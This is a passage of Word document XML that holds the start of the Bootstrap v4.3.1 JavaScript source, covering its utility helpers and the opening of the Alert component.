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F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t>/*!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  * Bootstrap v4.3.1 (https://getbootstrap.com/)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  * Copyright 2011-2019 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t>(function (global, factory) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  typeof exports === 'object' &amp;&amp; typeof module !== 'undefined' ? factory(exports, require('jquery'), require('popper.js')) :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  typeof define === 'function' &amp;&amp; define.amd ? define(['exports', 'jquery', 'popper.js'], factory) :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  (global = global || self, factory(global.bootstrap = {}, global.jQuery, global.Popper));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t>}(this, function (exports, $, Popper) { 'use strict';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  $ = $ &amp;&amp; $.hasOwnProperty('default') ? $['default'] : $;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  Popper = Popper &amp;&amp; Popper.hasOwnProperty('default') ? Popper['default'] : Popper;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  function _defineProperties(target, props) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    for (var i = 0; i &lt; props.length; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var descriptor = props[i];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      descriptor.enumerable = descriptor.enumerable || false;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      descriptor.configurable = true;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if ("value" in descriptor) descriptor.writable = true;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      Object.defineProperty(target, descriptor.key, descriptor);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    }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lastRenderedPageBreak/>
        <w:t xml:space="preserve">  function _createClass(Constructor, protoProps, staticProps) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    if (protoProps) _defineProperties(Constructor.prototype, protoProps);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    if (staticProps) _defineProperties(Constructor, staticProps);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    return Constructor;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_defineProperty(obj, key, value) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    if (key in obj) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      Object.defineProperty(obj, key, {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        value: value,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        enumerable: true,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        configurable: true,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        writable: true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 else {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      obj[key] = value;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return obj;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_objectSpread(target) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    for (var i = 1; i &lt; arguments.length; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var source = arguments[i] != null ? arguments[i] : {};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var ownKeys = Object.keys(source);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (typeof Object.getOwnPropertySymbols === 'function') {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        ownKeys = ownKeys.concat(Object.getOwnPropertySymbols(source).filter(function (sym) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          return Object.getOwnPropertyDescriptor(source, sym).enumerable;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        }));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ownKeys.forEach(function (key) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        _defineProperty(target, key, source[key]);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return target;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_inheritsLoose(subClass, superClass) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    subClass.prototype = Object.create(superClass.prototype);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    subClass.prototype.constructor = subClass;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    subClass.__proto__ = superClass;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--------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">   * Bootstrap (v4.3.1): util.js</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">   * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   * --------------------------------------------------------------------------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Private TransitionEnd Helpers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TRANSITION_END = 'transitionend';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var MAX_UID = 1000000;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var MILLISECONDS_MULTIPLIER = 1000; // Shoutout AngusCroll (https://goo.gl/pxwQGp)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  function toType(obj) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    return {}.toString.call(obj).match(/\s([a-z]+)/i)[1].toLowerCase();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getSpecialTransitionEndEvent() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    return {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      bindType: TRANSITION_END,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      delegateType: TRANSITION_END,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      handle: function handle(event) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if ($(event.target).is(this)) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          return event.handleObj.handler.apply(this, arguments); // eslint-disable-line prefer-rest-params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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        return undefined; // eslint-disable-line no-undefined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transitionEndEmulator(duration) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    var _this = this;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    var called = false;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    $(this).one(Util.TRANSITION_END, function () {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      called = true;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    });</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    setTimeout(function () {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (!called) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        Util.triggerTransitionEnd(_this);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duration);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    return this;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setTransitionEndSupport() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    $.fn.emulateTransitionEnd = transitionEndEmulator;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    $.event.special[Util.TRANSITION_END] = getSpecialTransitionEndEvent();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  }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lastRenderedPageBreak/>
        <w:t xml:space="preserve">   * --------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">   * Public Util Api</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">   * --------------------------------------------------------------------------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var Util = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    TRANSITION_END: 'bsTransitionEnd',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    getUID: function getUID(prefix) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      do {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        // eslint-disable-next-line no-bitwise</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        prefix += ~~(Math.random() * MAX_UID); // "~~" acts like a faster Math.floor() here</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      } while (document.getElementById(prefix));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      return prefix;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t xml:space="preserve">    getSelectorFromElement: function getSelectorFromElement(element) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var selector = element.getAttribute('data-target');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (!selector || selector === '#') {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        var hrefAttr = element.getAttribute('href');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        selector = hrefAttr &amp;&amp; hrefAttr !== '#' ? hrefAttr.trim() : '';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try {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        return document.querySelector(selector) ? selector : null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      } catch (err) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        return null;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t xml:space="preserve">    getTransitionDurationFromElement: function getTransitionDurationFromElement(element) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (!element) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      } // Get transition-duration of the element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var transitionDuration = $(element).css('transition-duration');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var transitionDelay = $(element).css('transition-delay');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var floatTransitionDuration = parseFloat(transitionDuration);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var floatTransitionDelay = parseFloat(transitionDelay); // Return 0 if element or transition duration is not found</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (!floatTransitionDuration &amp;&amp; !floatTransitionDelay) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      } // If multiple durations are defined, take the first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transitionDuration = transitionDuration.split(',')[0];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      transitionDelay = transitionDelay.split(',')[0];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      return (parseFloat(transitionDuration) + parseFloat(transitionDelay)) * MILLISECONDS_MULTIPLIER;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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    reflow: function reflow(element) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      return element.offsetHeight;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t xml:space="preserve">    triggerTransitionEnd: function triggerTransitionEnd(element) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      $(element).trigger(TRANSITION_END);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t xml:space="preserve">    // TODO: Remove in v5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    supportsTransitionEnd: function supportsTransitionEnd() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      return Boolean(TRANSITION_END);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t xml:space="preserve">    isElement: function isElement(obj) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      return (obj[0] || obj).nodeType;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    typeCheckConfig: function typeCheckConfig(componentName, config, configTypes) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      for (var property in configTypes) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if (Object.prototype.hasOwnProperty.call(configTypes, property)) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          var expectedTypes = configTypes[property];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          var value = config[property];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          var valueType = value &amp;&amp; Util.isElement(value) ? 'element' : toType(value);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          if (!new RegExp(expectedTypes).test(valueType)) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">            throw new Error(componentName.toUpperCase() + ": " + ("Option \"" + property + "\" provided type \"" + valueType + "\" ") + ("but expected type \"" + expectedTypes + "\"."));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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    findShadowRoot: function findShadowRoot(element) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (!document.documentElement.attachShadow) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        return null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      } // Can find the shadow root otherwise it'll return the document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if (typeof element.getRootNode === 'function') {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        var root = element.getRootNode();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        return root instanceof ShadowRoot ? root : null;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(element instanceof ShadowRoot) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        return element;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      } // when we don't find a shadow root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if (!element.parentNode) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        return null;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Util.findShadowRoot(element.parentNode);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    }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setTransitionEndSupport();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 = 'alert';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var VERSION = '4.3.1';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var DATA_KEY = 'bs.alert';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var EVENT_KEY = "." + DATA_KEY;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var DATA_API_KEY = '.data-api';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var JQUERY_NO_CONFLICT = $.fn[NAME];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var Selector = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    DISMISS: '[data-dismiss="alert"]'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 = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    CLOSE: "close" + EVENT_KEY,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    CLOSED: "closed" + EVENT_KEY,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    CLICK_DATA_API: "click" + EVENT_KEY + DATA_API_KEY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ClassName = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    ALERT: 'alert',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    FADE: 'fade',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    SHOW: 'show'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/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Alert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Alert(element) {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Alert.prototype;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_proto.close = function close(element) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var rootElement = this._element;</w:t>
      </w:r>
    </w:p>
